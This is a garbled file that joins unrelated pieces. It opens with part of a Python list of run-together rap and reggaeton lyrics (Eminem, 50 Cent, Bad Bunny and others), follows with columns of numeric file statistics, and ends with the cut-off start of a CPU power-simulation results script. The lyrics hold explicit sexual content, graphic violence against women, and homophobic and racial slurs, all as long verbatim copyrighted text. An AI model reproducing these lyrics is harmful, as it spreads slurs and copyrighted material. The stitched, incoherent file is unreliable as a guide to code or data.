conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda yo no soy carlos vives pero quiero que te montes en mi bicicleta le damo' la vuelta al planeta dime en qué país quiere' que te lo meta explícale que conmigo te sientes completa que yo sí te hago venir hasta que el totito se te aprieta dile que ya se acabó que mi nombre en tu piel se grabó que ahora tú estás con el bo' que no te alza la vo' periódico de ayer como dijo lavoe dile que fui yo el que entró pa' tu cuarto y te robó , yeh explícale, que te gusta cómo te lo hago ve y cuéntale que conmigo en la movie to' pago que tú no eres mujer de ser infiel pero que te cansaste y no quieres con él explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda y ese momento en que yo , todo te lo hago olvidar y es que conmigo tú sientes como que el tiempo se para dile que mientes cuando estás sin ropa dile lo que te hago sentir, que ya no puedes fingir y que conmigo tú te vuelves loca no lo puede' resistir, se volverá a repetir explícale que, en la cama, lo íntimo no es igual confiésale, que cambiaste tu forma de pensar explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda yeh, yeh, yeh, yeh bad bunny, baby-bebé-bebé-bebé bad bunny #update yandel hear this music hear this music dj luian mambo kingz, ¡mambo kingz! yandel jajaja trap kingz trap kingz, baby, bebé dímelo, bf "]
em10 = ["50 cent eminem green lantern yeah shady haha 50 cent gggggunit haha here we go again yeah the evil genius green lantern 50 cent does it make you mad when i switch my flow you can't understand how i get my dough 50 cent i'm on fire 'cause shady said so i'm on fire eminem everybody's in a rush to try to get the throne i just get on the track and try to set the tone i ain't tryin' to use nobody as a steppin' stone but don't compare me i'm better off just left alone and i ain't even tryin' to go there with record sales i'm just tryin' to keep it humble and respect myself say what up keep steppin' and just rep d keep my nose clean stay away from weapons jail and livin' reckless but if you go check my belt you may see something else i use to protect myself a vest to stop a rueger and deflect the shells and send 'em back at you faster than they left the barrel and i don't even carry guns no more i don't got to got undercover cops that'll legally pop you and i done seen a lot of people cross the line but this motherfucker ja must have lost his mind that x got him thinkin' he was dmx then he switched to pac now he's tryna be him next so which one are you x luther pac or michael just keep singin' the same song recycled we'd all much rather get along than fight you me and hailie dance to your songs we like you and you don't really wanna step inside no mic booth come on now you know the white boy'll bite you i'll hurt your pride dawg and you know i don't like to but i will if i have to with syllable after syllable i just slap you killin' you faster than you poppin' pill after little pill of them tabs of that shit you on but if you want it you got it you'd bump this shit too if we ain't diss you on it but if we lock horns we can charge harder than busta green lantern we bump heads with any motherfucker that wants to so what's the deal where was all the tough talk when i walked up to you like ja what up dawg how come you didn't say you had a problem then when you was standin' there with all your men we coulda solved this then i'm a grown man dawg come holla all you did was slap hands smile and swallow another one of them little x pills in front of me and tell me 50 cent was everything you wanna be come on 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me tony tony yayo you couldn't son me if my father helped you my punchlines is hot my bars will melt you ja you stuart little shells'll lift you every other week i'm buyin' a new pistol i clap at your ass with this chrome 8 and put six thru your hats a seven and 8's irv you ain't suge knight you shook night i'll put my knife in your wind pipe and breeze through the turnpike you know and i know who took your chain you got robbed two times so your ass is lame i'm down to die for this shit all i need is bail you better stick to the movies with steven segal bitch 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me lloyd banks lloyd banks fuck that i'm miles away and these industry niggas startin' to get outta hand like i won't find your whereabouts by stompin' 'em out your man we killin' new york even in compton they understand i'm on the block where you was raised blowin' chocolate up out your van and break it break it break it down they see me pop a boy icy 'cause i could you been gone so long you probably forgot your way around the hood hood 'cause when you paranoid it's hard to make a song how you want it with us if half of your artists got makeup on every magazine i open you on your knees takin' prayer pictures and you ain't even got shot yet you scared bitches you don't know nothin' 'bout what pain is sucka i'll put your ass underground like a train conductor muh'fucker 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me wanna bump heads with me i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me wanna bump heads with me tony yayo yeah nigga yeah shady aftermath gunit fuck you think they call us gunit for 'cause we move units huhuh don't think we ain't billin' you for this motherfuckin' studio time matter of fact keep it on 50 we'll call it even ha produced by just blaze 'cause some things just don't change it's better when they stay the same although the whole world knows your name some want a bigger stage they came to see you spit your game whoa but it shouldn't be difficult to explain just why you came back again you hate the fame love the game cold as ice you remain fuck 'em all tell 'em all eat shit here we go again adlibs oh god damn is it that time again already haha okay y'all dont look too happy to see me fuck man dont everybody welcome me back at once all right fuck yall then you can get the dick just call me the ballsack i'm nuts michael vick in this bitch dogfall back you mutts fuck your worms you've never seen such a sick puppy fuck it a sick duck i want my duck sicked mummy and my nuts licked gobble 'em up trick yummy bitch you don't fuckin' think i know that you suck dick dummy you'll get your butt kicked fuck all that love shit honey yeah i laugh when i call you a slut it's funny shorty dance while i diss you to the beat fuck the words you don't listen to 'em anyway yeah struck a nerve sucker motherfucker might as well let my lips pucker like elton john 'cause i'm just a mean cocksucker the shit is on 'cause you went and pissed me off now i'm shittin' and pissin' on everybody give a fuck if it's right or wrong so puff the buddha light a bong but take a look at mariah next time i inspire you to write a songcome on oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohoh fuck it i'm a loose cannon bruce banner's back in the booth y'all are sittin' ducks i'm the only goose standin' i'll set the world on fire piss on it put it out stick my dick in a circle but i'm not fuckin' around motherfucker i'll show you pussyfootin' i'll kick a bitch in the cunt 'til it makes a queef and sounds like a fuckin' whoopee cushion who the fuck is you pushin' you musta mistook me for some sissy soft punk lookin' for some nookie or bosom go ahead fuckin' hater push me i told you ain't no fuckin' way to shush me call me a faggot 'cause i hate a pussy man the fuck up sissy g's up all you gardeners freeze up put your hoes down shady ease up man chill nah i can't goddamn it rap is a landfill drop the anvil these are shoes that you can't fill shit the day that happens the world will stop spinnin' and michael j fox'll come to a standstill during an earthquake urine in your face 'cause you're fake lightning noise ow what the fuck that hurt wait lightning noise ow what the fuck i just got struck by lightnin' alright then i quit god i give up call it evil that men do lord forgive me for what my pen do this is for your sins i cleanse you and you can repent but i warn you if you continue to hell i'll send you and just then the wind blew and i said oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohohoh oh how long will i be this way shady until my dyin' day 'til i hang up the mic and it's time for me to say so long 'til then i'll drop the fuckin' bombs like i missed the pass when i went long if you don't like it you can kiss my ass in a lint thong now sing along slut this slut that learn the words to the song oh bitches don't like that homie i'll be nicer to women when aquaman drowns and the human torch starts swimmin' man i'm a cold soul i roll so don't compare me to them other bums over there it's like apples to oranges peaches to plums yeah i'm bananas pussy cut off the grapes and grow a pair but i swear you try to diss me i'll slaughter you i put that on everything like everyone does with autotune the last thing you want to do is have me spit out a rhyme and say i was writing this and i thought of you so oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohohoh oh i don't know i don't know what caused i don't know what caused me to be this way i don't know i don't know but i'll probably be this way 'til my dyin' day i don't know why i'm so i'm so cold mean things i don't mean to say i guess this is how you made me rbx remember me seven executions remember me i have no remorse remember me i'm highpowered remember me i drop bombs like hiroshima rbx for this one they scream x you retarded 'cause i grab the mic and get down like syndrome hide and roam into the masses without boundaries which qualifies me for the term universal without no rehearsal i leak words that's controversial like i'm not the one you wanna contest see 'cause i'll hit your ass like the train did that bitch that got banned from tv heavyweight getup hit you watch your whole head split up loco is the motion we comin' through hollowtips is the lead the 45 threw sticky fingaz remember me throw ya gunz in the air remember me slam slam remember me nigga bacdafucup remember me chkachkaonyx sticky fingaz niggas that take no for an answer get told no yeah i been told no but it was more like no no no life's a bitch met her fuck you if you let her better come better than better to be a competitor this vet is ahead of the shit it's all redder you deader and deader a medic instead of the cheddars and credda settle vendetta with metal beretta from ghetto to ghetto evidence nope never leave a shred of i got the soul of every rapper in me love me or hate me my mom's got raped by the industry and made me i'm the illest nigga ever i told you i get more pussy than them dyke bitches total want beef nigga pbbt you better dead that shit my name should be can'tbelievethatniggasaidthatshit probably sayin' he ain't a killer but i'm killin' myself smoke death fuck bitches raw on the kitchen floor so think what i'ma do to you have done to you got niggas in my hood who'd do that shit for a blunt or two what you wanna do cocksuckers we glock busters 'til the cops cuff us gon' start ruckus and drop blockbusters round the clock hustlers you cannot touch us i'm gettin' wires niggas wantin' me dead wantin' my head you think it could be somethin' i said eminem remember me i just don't give a fuck remember me yeah fuck you too remember me i'm low down and i'm shifty remember me i'm shady eminem dr dre when i go out i'ma go out shootin' i don't mean when i die i mean when i go out to the club stupid i'm tryin' to clean up my fuckin' image so i promised the fuckin' critics i wouldn't say fuckin' for six minutes six minutes slim shady you're on my baby's mom bitch made me an angry blonde so i made me a song killed her and put hailie on i may be wrong i keep thinkin' these crazy thoughts in my cranium but i'm stuck with a crazy mom is she really on as much dope as you say she's on came home and somebody musta broke in the back window and stole two loaded machine guns and both of my trench coats six sick dreams of picnic scenes two kids sixteen with m6's and ten clips each and them shits reach through six kids each and slim gets blamed in bill clint's speech to fix these streets fuck that pbbt you faggots can vanish to volcanic ash and reappear in hell with a can of gas and a match aftermath dre grab the gat show 'em where it's at what the fuck you starin' at nigga eminem don't you remember me remember me remember me remember me slim shady hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from warning this shit's gon' be rated r restricted you see this bullet hole in my neck it's selfinflicted doctor slapped my momma bitch you got a sick kid arrested molested myself and got convicted wearing visors sunglasses and disguises 'cause my split personality is having an identity crisis i'm dr hyde and mr jekyll disrespectful hearing voices in my head while these whispers echo murdermurder redrum brain size of a bread crumb which drug will i end up dead from inebriated 'til my stress is alleviated how in the fuck can eminem and shady be related illiterate illegitimate shit spitter bitch getter hid in the bush like margot kidder jumped out rrrah killed the bitch and did her used to let the babysitter suck my dick when i was littler smoke a blunt while i'm titty fucking bette midler sniper waiting on your roof like the fiddler y'all thought i was gonna rhyme with riddler didn't ya bring your bitch i wanna see if this dick gon' fit in her hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i lace tunes that's out this world like space moons with a bunch crazed loons dismissin' brains like graze wounds nothing but idiots and misfits dipshits doing whippets passed out like sampler snippets where's the weed i wanna tamper with it i'ma let your grandpa hit it lace it up with cocaine so he can't forget it fuck it maybe i'm a bum but i was put on this earth to make your baby mama cum so what i'm on is way beyond the rum or any alcoholic beverage losing all of my leverage went up inside the first national bank broke and left rich walking biohazard causing wreckage smoked out like eckrich dandruff's making my neck itch what the fuck give me the check bitch you just lost your tip there's a pubic hair in my breakfast got shit popping off like bottle cap tips get your cap peeled like the dead skin of your mama's chapped lips slap dips support domestic violence beat your bitch's ass while your kids stare in silence i'm just joking is dirty dozen really dust smoking if all your shit's missing then probably one of us broke in hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from my head's ringing like it was spider sense tingling blitzin' like green bay did when they shitted on new england i'm out the game put the second string in this brandy got me swinging bobbing back and forth like a penguin allah allah delinquent choking microphones with broken english make your mama be like whoo this is good who sings this slim shady his tape is dope i dug it it's rugged but he needs to quit talking all that drug shit it was predicted by a medic i'd grow to be an addicted diabetic living on liquid triaminic pathetic but i don't think this headache's ever vanishing panicking i think i might have just took too much anacin frozen mannequin posin' stiffer than a statue i think i'm dying god is that you somebody help me before i od on an lp take me to er asap for an iv motherfuck jlb they don't support no hip hop they say that's where it lives the closest they gon' come is pac it's politics it's all a fix set up for these white bluecollared hicks it's to make a dollar off of black music with a subliminal ball of tricks for those who kiss ass and swallow dicks hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from produced by da brigade eminem yo miccheck my dick testing one two fuck my dick my nuts eminem my attitude is worse than nwa's was i'll battle you over stupid shit and diss people who ain't have shit to do with it like cool j does my tattoo you see me standin' outside of your buildin' screamin' puffy is good but slim shady is for the children i look at my life in a new light fuck it give me two mics i write songs for me fuck what you like you probably hear me rap halfhearted 'cause i don't like rap anyway i'm just tryna get my porno career started oh hell yeah every place and event been there done that shit dre stuck me in a suitcase when he went want a deal study these five chapters lesson throw demos as hard as you can at signed rappers lesson face 'em and diss 'em what up dawg don't give 'em a demo kidnap 'em come on you're comin' with me motherfucker check this out and make 'em come to your basement and listen lesson get a job at a label switch demos with canibus and put yours on the owner's table here listen lesson 4 know you heard this before hey let me get your number i'll call you tomorrow for sure don't act like a fan you wanna get signed get the whitest ar you can find pull him aside and rap as wack as you can hey dude come here lesson 5 get a hookup at jive dress up like icp and have them come see you perform live and that's the key but when you see me on the street i ain't givin' you shit bitch don't even bother askin' me toilet water splashes me right in the ass when i'm spittin' 'cause i'm always shittin' when i'm rappin' like master p ungh got a blowjob from paula jones and stuffed it so far in her mouth my balls broke both of her collarbones told mya this shit was all about meah gave alyssa milano syphilis mono and gonorrhea and all three of my main girls said see ya 'cause brandy and monica walked in and caught me fuckin' aaliyah i splishsplash while i'm takin' a bath grab a handful of pills break 'em in half take 'em and laugh white trash fuckin' your wife in the ass while you're out siphonin' gas for your lawn mower to cut the grass eminem so if i hurt your selfesteem and you get dissed too bad yo why you diss me you know i just be sayin' that to get you mad and when i rap about a buncha shit you wished you had a big dick you know i just be sayin' that to get you mad i can't listen to that song that shit's too sad you know i just be sayin' that to get you mad he'll never make it his wrist is slit too bad nurse nurse you know i just be sayin' that to get you mad eminem what a wonderful day i should go outside and play ain't no need to sit inside the house and hibernate hi renée oh hi i was just about to toss a live grenade in your driveway and drive away what are you afraid of a blade made of a razor with aids blood drippin' from it rippin' your stomach like a paper mâché you talk a lot of shit but you was never ill though i'm sick enough to beat you to death with a feather pillow tipped over some cows just for a joke and a laugh jumped up choked a giraffe snapped his neck and broke it in half wagin' wars went on stage and sprayed cage with agent orange and wiped my ass with his page in source here the demon is here i'm steamin' this year i rip voice box out and scream in his ear it's not a gimmick bitch it's an image i live it give a fuck i don't know what a fuck is to give it yeah i don't think this guy is well i'm high as hell i'll beat you with a live cat when i'm swingin' him by his tail i'll fuckin' i'll fuckin' lay your nuts on the dresser just your nutsack by itself and bang them shits with a spiked bat cut your neck off then sew your head right back and leave you like that you just triggered a prick who just mixed liquor who's itchin' to leave you disfigured and stiffer than christopher reeves i was dealing with strep throat while your mother was breastfeeding and gave her the flesheating disease i'm iller than takin' a hammer and beating your knees and walkin' through south central la bleeding in jeans am i a blood or a crip wakin' up the next day in breathing machines flashin' back to bein' shot and repeating the scenes on how you just got smoked and if you do live you'll be too scared to tell it like a biggie and pac joke eminem so if i hurt your selfesteem and you get dissed too bad you know i just be sayin' that to get you mad and when i rap about a buncha shit you wished you had you know i just be sayin' that to get you mad i can't listen to that song that shit's too sad you know i just be sayin' that to get you mad he'll never make it his wrist is slit too bad you know i just be sayin' that to get you mad eminem sway i know that makes you real mad don't it uhhuh that's right slim shady yup sway and tech sprayin' wreck bitch and we don't give a heck uhuh or a damn or a fuck or a shit so suck my mothafuckin' dick the wake up show let me tell you what it mean to me it mean hard beats hard rhymes bboys hiphop baby all the way forever shook ones pt ii time's up insane in the brain 8 mile sweet home alabama juicy gotta get mine gang stories this is how we do it feel me flow players ball get money i'll be there for you shimmy shimmy ya bring the pain lose yourself cream next level nyte tyme mix temptations player's anthem lose yourself tony yayo 50 cent shady yeah 50 cent who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know 50 cent now homie i say i run it run it 'cause i'm in control hpnotiq hennessy a couple shots of patrón i have you feelin' a'ight i get you high as a kite party poppin' shawty says she comin' with me tonight i ain't shoulder leanin' i ain't snappin' and poppin' either i'm bobbin' my head or i'm just standin' there watchin' i'm a hustler i hustle you can tell that i'm paid and i protect what i got i'm in the house with my blade nigga you front you gon' get it okay now maybe i've said it 'cause i want you to tridip yeah i be on that shidit you should see when i'm stuntin' i flash the stones to be wantin' push the whip see me rollin' you can tell that i'm holdin' i'm just doin' my thang you know the unit's the gang i got my grimy shady with me you front you'll have to get me off yo' ass i pay the lawsuit and laugh haha it's not a big deal it's nothin' but some cash let's go 50 cent who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know eminem when me and fif' got together to do this music the more we became enveloped we just developed a fellowship through it it's no pretend shit it's friendship mi nemesis es su nemesis same for him it's just media see to them it's just images but this shit is no gimmicks this is blood in and blood out when it's beef you just gotta know when to butt in and butt out if there's a problem we solve it if we don't resolve it it usually just evolves into one big brawl and we all get involved in it and we should all get a merit this much beef we inherit and wear it like a badge with honor pass it around and share it and let it go to whoever's holdin' the most current beef on their shoulders and their soldiers got their backs 'til it's over but tonight we ain't come in here to beef with nobody we came to party banks cahis and mr ferrari so it's shady aftermizath back in that ass you izzask come izzon what kinda fizzuckin' quizzestion is that 50 cent eminem who run it you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know who run it i said you know but you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know cahis pistol play ricochet see where the victim lay slumped over bleedin' jfk hk 'til your chest plate cave i'ma ride to the death do you rep that way forever i'ma be a shady 74 gangsta pussy i'll survive everything you got in that chamber i thrive off of danger jumpin' in all beef you keep talkin' shit now the squad have called me 4 lloyd banks enough holdin' back the steam em let off a magazine dappadon cappa queens mixed in with cahis creams started off with half a dream developed into what you see tellin' ain't my cup of tea can't tell i'm a fuckin' g i'm on automatic when i'm at it start static and you splattered shit shattered i'm a walkin' bitch magnet spit it how i live it live it allway to the limit and i'm always on my pivot for my digits you dig it see 50 cent who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know tony yayo you know who this is shady gunit aftermath lloyd banks cahis marshall mathers ferrari f50 it's a movement you can't stop it talk of new york tony yayo pt i hands up officer dont shoot then pull your pants up promise you won't loot we may never understand each other its no use we aint ever gonna grasp what each other goes through black boy black boy we ain't gonna lie to you black boy black boy we don't like the sight of you pull up on the side of you window rolled down 'profile' then we wonder why we see this side of you probably comin' from the dope house we could let you slide but your tail light is blew out we know you're hidin' that heidi klum on you another drug charge homie it's back inside for you and just in case a chase might ensue we got that tried and true pistol drew right at you we'd be delighted to unload it in your back then walk up and lay that taser on the side of you fucked up but what the fuck am i to do i keep tellin' myself keep doin' like you're doin' no matter how many lives you ruin it's for the red white and blue time to go find a new one and split his head right in two no one's ever indicted you why 'cause you're a eminem cheech and chong white boy white boy you're a rockstar my momma talkin' to me tryna tell me how to live white boy white boy in your cop car but i don't listen to her 'cause my head is like a sieve white boy white boy you're untouchable the world's coming to an end i don't even care nobody can tell me shit 'cause i'm a big rockstar black boy black boy we don't get your culture and we don't care what our government's done to fuck you over man don't tell us your attitude's a result of that balderdash whered you get the chip on your shoulder at why you kicking that soda can pull your pants up we 'bout to roll up and throw your ass in the van cuffed you don't have to know our plans or what our intentions are our cards are close to our chest you better show your hands and put our minds more at ease or get shot in the thyroid comply or die boy we're fightin' a crime war here come the swine tryna clean up the streets from all these minorities that's what we call 'em pigsties for they're like eyesores to police talk to you like just a piece of trash feels like we're stuck in a time warp to me as i kick these facts and get these mixed reactions as this beat backspins it's like we're drifting back in to the sixties having black skin is risky 'cause this keeps happening throughout history africanamericans have been treated like shit and i admit there have been times where it's been embarrassin' to be a eminem cheech and chong white boy white boy you're a rockstar my momma talkin' to me tryna tell me how to live white boy white boy in your cop car but i don't listen to her 'cause my head is like a sieve white boy white boy you're untouchable the world's coming to an end i don't even care nobody can tell me shit 'cause i'm a big rockstar pt ii seems like the average lifespan of a white man is more than twice than a black life span i wonder sometimes if it has a price scanner i feel like checking out on life can't escape this circumstance i'd rather hear 'em say die nword than die antwoord ninja now it's better disguised banter but that's life strapped 'cause we're strapped financially and can't find answers we're applying but mcdonald's seems to be the only franchise that'll hire so how can we have higher standards as dallas overshadows the battle for black lives matter we fight back with violence but acts like that are black eyes on the movement which makes black lives madder at cops and cops madder that's why it's at a stalemate and can't arrive at a compromise so it's black ops i wonder if we hire more black cops the crap stops the block is our backyards officers not the crack spot call the attack dogs off of us man you always act all pissed off at us at a traffic stop and bad cops fuck it up for the good cops and man stop sendin' white cops in the black neighborhoods who ain't acclimated to 'em like that's the way to do it who seen some fuckin' videos of rappers waving guns and know nobody black so they act afraid of us and that's racism the fear that a black face gives 'em a subconscious racist wait why are there black neighborhoods 'cause america segregated us designated us to an area separated us sectioneight'd us when we tear it ups the only time attentions paid to us and education sucks and every day's another freddie gray for us a levy breaks or fuzz why is it they treat us like dryer lint we just want a safe environment for our kids but cant escape the sirens dont take a scientist to see our violent nature lies in the poverty that we face so the crime rates the highest in the lowest classes it's like a razor wire fence and were trapped in these racial biases that plague our society which makes our anxiety levels raise every time we see a devils face lions tigers and bears oh my it's more like billy clubs and gats and we really love it when you think were guilty cause were black but you kill each other facts you peel each other's caps for silly stuff like hats single mother strugglin through substance abuse while people with nothin' to lose shoot each other for shoes fuck your republican views pull ourselves up by our bootstraps where the fuck are the boots and streets act as a narrator don't gotta read comics or be that into characters just to see that just to be black you better be strapped with a derringer or be capped in america like steve rogers 'cause no one oversees these cops and all we see is 'em beat charges we done seen 'em beat rodney king unconscious and got off so we don't need all you crooked police officers' peace offerings just keep marchin' 'til we reach congress but they're gonna say you're tryin' to take an irrational stance if you try to slander the flag but somebody has to be the sacrificial lamb so they call it a kaepernick tantrum if you don't stand for the national anthem we raise it you better praise it or you'll be made to feel like a traitor we'll treat you like rodney dangerfield home of the brave is still racist 'ville so this whole nation feels like a plantation field in a country that claims that its foundation was based on united states ideals that had its natives killed got you singin' this starspangled spiel to a piece of cloth that represents the land of the free that made people slaves to build verse eminem you know it's devil's night the way that i smash the face of a punk in mask of jason is a fashion statement since drunken master tapes been a basket case and if that's the case then i'm dunkin' fascination with masturbation and humpin' lacerations and masking tape and i'm bumpin' some masta ace roll up posin' as pastor mase at a luncheon see andrea yates grab her face then i'm punchin' crack her fuckin' skull with an antique vase kill her husband to the back of the station wagon she's dragged and placed in the trunk and now i'm wanted for kidnappin' rape and abduction spread her legs like land o'lakes that i'm cuttin' 'til every fuckin' limb's either amputated or punctured decapitated christina applegate and i rap like i'm agitated no chill but i'm half sedated a functioning addict wait i'm in london brains underwear a pantywaist classic case of disfunction aggravated assault it was rap related you activated a gunman this game's oversaturated with junk and you punks couldn't get a hit from a database with a thumbprint razors and matches path is laid for destruction put jason mraz's face in his ass then i'm snatchin' anne hathaway she scratchin' like jam master jay on the one's and two's i slash away then i'm dumpin' her ass in a lake placid for alligators after i use the fuckin' tire thumper to bash her brains in for nothin' the murder weapons i stash 'em away on runyon man the kind of balls that it has to take and the gumption lack of class displayed but such a vast array in abundance of sad disgraceful and bad distasteful redundance and bitch i'm hung like candy canes if you're wonderin' balls come at you like batting cages i'm raw like big daddy kane is i'm comin' like i'm ejaculatin' and nuttin' come catch the clap like you're pattycakin' lil' dumplin' or brace yourself like a cast and be the last to make an assumption i'm back like i'm in the bathroom takin' a dump and it's back in the day or somethin' i'll shit on you devil's night how's that for a duction champtown get your rusty ass over 'fore i put a shine to it see man it's man i trust so i'mma rhyme to it 0 out of a hundred groups are mediocre they took a medicine effect and i'm a pretty choker so once you got a couple microphones well i'mma rep 'em you got some nile rapper rivers too well i'mma check 'em because they new to this i'm true to this they shouldn't be doin' this a lot of rappers reppin' keepin' miles is a few in this game to maintain i keep it going on you hear the and the funky beat i'm flowin' on i don't tell 'em when i see it i just spot it just runnin' me have soul and ain't the only person got it and blacks don't have to act white if they like red hot chili peppers and whites dont have to act black if they like saltnpepa cause i like a lot of people mucus on the so i'm blackened like metallica look at me in shock but nothing else matters wherever i may roam the microphone's my best friend and the stage is my home our music got the sounds our rhythms got the hooks i listen to kenny rogers marvin gaye and garth brooks i listened to that that's and but music is good music the other is mess the you chocolate and a peppermint what color is my soul here's a hint let's hook 'em"]
| 26,141.333333
| 48,151
| 0.774074
| 33,408
| 156,848
| 3.634549
| 0.18771
| 0.004843
| 0.002882
| 0.002446
| 0.282129
| 0.272543
| 0.262183
| 0.256558
| 0.253148
| 0.250636
| 0
| 0.002662
| 0.209662
| 156,848
| 5
| 48,152
| 31,369.6
| 0.976759
| 0
| 0
| 0
| 0
| 1
| 0.999579
| 0.002059
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.6
| 0.4
| 0
| 0.4
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
f3e0a6687547be2fb0919284dab059c9f500e713
| 68,615
|
py
|
Python
|
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/combinations_spec_heteroFair/cmp_soplexmcfcalculixgcc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.111939,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.29061,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.603482,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.328402,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
